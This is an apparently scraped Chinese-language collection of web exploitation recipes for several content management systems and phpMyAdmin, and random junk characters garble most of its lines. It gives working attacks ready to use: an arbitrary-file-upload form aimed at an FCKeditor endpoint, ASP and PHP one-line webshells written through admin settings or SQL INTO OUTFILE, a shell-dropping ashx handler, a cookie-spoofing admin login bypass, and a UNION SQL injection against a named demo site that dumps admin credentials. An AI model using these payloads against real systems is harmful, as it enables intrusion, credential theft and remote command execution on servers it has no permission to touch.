如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
0 `4 j; O9 N: N3 j) o I- c<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">3 h1 G4 {; C9 `% K) V J# i1 l
Upload a new file:<br>
f7 a) @9 O2 u. V<input type="file" name="NewFile" size="50"><br>& n8 b7 X: \; O2 y( ?6 K7 t
<input id="btnUpload" type="submit" value="Upload">
4 J4 ~, n# S, f7 M; p</form>
2 Z n+ A( F+ v; m# @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- I- g4 Y# D" E0 G' A& c. |6 y# M' ] n
; ] f0 l6 y/ T+ z: ]/ ?, gSDcms 后台拿webshell. p% I& v: B5 U" |9 l9 m4 k0 Z
- d- \- g5 B! g' _2 [; m5 Q, z: [
第一种方法:
6 P7 z! `$ f2 v* V进入后台-->系统管理-->系统设置-->系统设置->网站名称;
# R7 ^# p. E' a) S ^把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx& U: m( T, A2 ?) x% T
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。" W# }: W% o, `5 c2 f
第二种方法:
, {2 u7 d) G( G& y进入后台-->系统管理-->系统设置-->系统设置->上传设置; `' @& ]) K6 t
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
) c6 Q0 h% s6 M0 B$ i" t第三种方法:- T$ M1 e9 N& y1 y' v( t' `9 b
进入后台-->界面管理-->模板文件管理-->创建文件5 n# [4 O# p0 V- A! Z, U5 l; u
文件名写入getshell.ashx. B- E& ~6 M* ~! ]- c
内容写入下面内容:( C- L: |: x) A: R( Q5 p
/====================复制下面的=========================/0 O$ |3 w5 }6 c2 u( `- c! O l
<%@ WebHandler Language="C#" Class="Handler" %> [( g; {$ q1 x3 ]7 \* R
using System;/ B/ N; Z. S9 ~7 o1 [& b; }6 ?9 C9 q
using System.Web;" [/ d+ J* l+ [( }
using System.IO;
0 Q. e7 p& P N) bpublic class Handler : IHttpHandler {9 l' q5 r5 B" `9 g- @' p
public void ProcessRequest (HttpContext context) {( K' x4 C/ z- B6 b6 q; j! Z
context.Response.ContentType = "text/plain";* G* |& g7 F; h" z
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
7 K$ M' i% K9 gfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
, r2 T1 Q0 s4 `/ r' C2 jfile1.Flush();
/ f: z4 N" \5 y1 tfile1.Close();
; L& F8 X% k \}
! {7 y9 C, R6 q) U; K2 ypublic bool IsReusable {
# H& t- @- i- b0 `: ]0 n. _get {) U6 _5 z$ R7 v
return false;
3 {6 B) E" z* K0 q$ C( f) }}2 s5 L6 X2 Y% k6 \
}9 } _& o: _; X5 A6 Q- K
}* b2 y% ~3 l6 z
/=============================================/
. |2 ?' o8 p% z4 h. g" O) i访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx, n1 A- v4 h# W6 m5 P2 m2 Z* J
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接) V1 l8 Z# k* ^9 q# J! C
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 F) I; W: f: @) O
) h7 c& p& @9 a; H- h! W
ESCMS网站管理系统0day
: N# j8 o! L" ^- f& k6 J$ H; l+ C" `8 ?) R) n% F" W6 e
后台登陆验证是通过admin/check.asp实现的
- G3 R3 N6 {0 W6 g2 W. m, M1 e4 t5 A1 I4 c7 P$ O6 j. ]
首先我们打开http://target.com/admin/es_index.html! j% w3 \' S$ n2 ?% c
然后在COOKIE结尾加上) N, p3 f# b7 ?+ `1 Y
; ESCMS$_SP2=ES_admin=st0p;
" O4 |$ h. ~) t' B* w/ I P7 ]修改,然后刷新
) C5 X% c, u6 Y6 @; {进后台了嘎.." G3 h$ V4 I2 D1 s8 e" l& j5 j
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL" n" o4 s) h* z h( J" Q! ^3 }
f n) |% A" [# F
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
1 Z, |2 o7 i" S' w- h: U3 W8 v嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
+ q' h" X; V6 S# W/ {, \5 \存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..& _$ s T9 G m& D( G
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
* Y7 U5 E& S) K------------------------------------------------------------------------------------------------------------------------------------------------------------------------------. f% p* {6 r0 q
$ }7 o6 p; ]. g; k6 h8 h% U宁志网站管理系统后台无验证漏洞及修复6 x, ]# D, y3 D; X) X
' r! v* l" Z6 ?4 C
网上搜了一下,好像没有发布.如有雷同纯粹巧合!# t5 C+ ?# F, }, u6 [1 }
官方网站:www.ningzhi.net
* f. J# W* Z# z& y* u. q学校网站管理系统 V.2011版本 8 C2 J% v: W8 k' l0 P9 @7 W
http://down.chinaz.com/soft/29943.htm
% }$ q& i& J7 ?. X5 v其它版本(如:政府版等),自行下载.
( V; ^* T7 k1 Y1 J+ v- v漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
9 v6 V9 O- r6 nlogin.asp代码如下:
, M8 i! u! b6 K0 |" x<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> $ w0 ]2 m: m# k! p: s# J) R
manage.asp代码我就不帖出来了.反正也没验证.
9 ?1 V" {1 y: N/ L# h只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!' S4 S' B% F8 s2 b6 ^) }
漏洞利用:
( \0 z* _0 ^- E3 o" `直接访问http://www.0855.tv/admin/manage.asp) i0 d5 y- ?7 g2 V6 X, V
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
1 T: C9 Y2 \) E( n4 k----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 G" Y! O3 g5 e4 s2 m; H0 h/ b
" B* u8 ]! G1 E9 x6 s3 ^% mphpmyadmin拿shell的四种方法总结及修复
( Q. B$ l6 \7 S( K, E( D9 D- n: x, b8 U" R' \& f: m) p( f/ L
方法一:& X. G9 O( }. s$ d4 N0 }9 y! A0 Y
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
2 a; A {: ?/ d- H' ^/ SINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');. Q) O I) ?4 l2 C2 T: H6 ~( r1 H
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';4 o: U: C1 k1 v. z
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php. i- Q6 Q2 P7 U2 u+ w. \" |( e6 @
一句话连接密码:7on% L* n W% c' o: N6 A
方法二:7 S! m1 l6 X7 w
读取文件内容: select load_file('E:/xamp/www/s.php');
& d1 d" B1 e; j' r# l写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'8 r- M1 f' }: j& N5 `! O: A1 p
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php' Q4 Q `: l( {; P9 k% {# u
方法三:4 V: ` ~. \" W% D1 e
JhackJ版本 PHPmyadmin拿shell* u. t& X$ `4 I b. c) O
Create TABLE study (cmd text NOT NULL);
6 p2 V. ]( O' @6 ^Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
2 [* m5 B5 n+ S8 m1 xselect cmd from study into outfile 'E:/wamp/www/7.php';* p4 N8 v& j+ Z! J2 z8 A$ T: d
Drop TABLE IF EXISTS study;1 g5 u% ]; E$ S) P1 n
<?php eval($_POST[cmd])?>+ j6 z# X- n6 d6 x C$ F# `3 O
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
: B8 I: t/ Y nINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1$ R9 G3 N3 U" J3 d" _7 ?! y
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
! M4 E5 V( @; W" D' QDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。8 P' |5 z, Z1 n6 C' {; \0 W; z
方法四:
) N" Z# l! {/ K, rselect load_file('E:/xamp/www/study.php');5 j4 e$ j7 t9 W9 j' Z; p' I
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'- _1 u- t, H6 Y
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir+ X# |$ w1 I* d0 P0 _5 C
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 A1 t2 _ k4 d/ W# H2 `* C# m) n, k7 b- U) a ~
NO.001中学网站管理系统 Build 110628 注入漏洞
2 R R8 G" o6 A# L( }: N: T( Y8 R" c
NO.001中学网站管理系统功能模块:
7 j t: k* y; Z3 K0 R1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等' k. | o4 P' Y' K
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
}0 I" H# Z) ? \" Y2 A3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
$ }0 {( n: A' {- p4 C$ ^4.视频图片管理:一级分类,动态添加视频或者图片等信息7 W* V" y) M+ ^7 Y
5.留言管理:对留言,修改,删除、回复等管理
) P) h0 X$ w8 E5 i+ I; h; E6 U6.校友频道:包括校友资料excel导出、管理等功能7 i. `! M- h; u# i! @3 k, D
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
( `* ^9 Z7 L5 b1 G, b L. g! ^默认后台:admin/login.asp7 ]& A9 m3 \- _8 H! i, i) [! [6 H
官方演示:http://demo.001cms.net
. I+ g9 t8 F# l5 u源码下载地址:http://down.chinaz.com/soft/30187.htm+ m& Y0 K. I$ f4 }; q$ X
EXP:
2 E9 L6 I- i r! ^$ x3 Uunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin8 p1 c: A+ N. H* C4 ?6 u2 H
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin6 m$ E& D4 J' b! j6 }7 v) y
getshell:后台有备份,你懂的+ k3 I* P+ ]7 z) m9 w0 x
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
3 R o; q1 J& ?" }------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |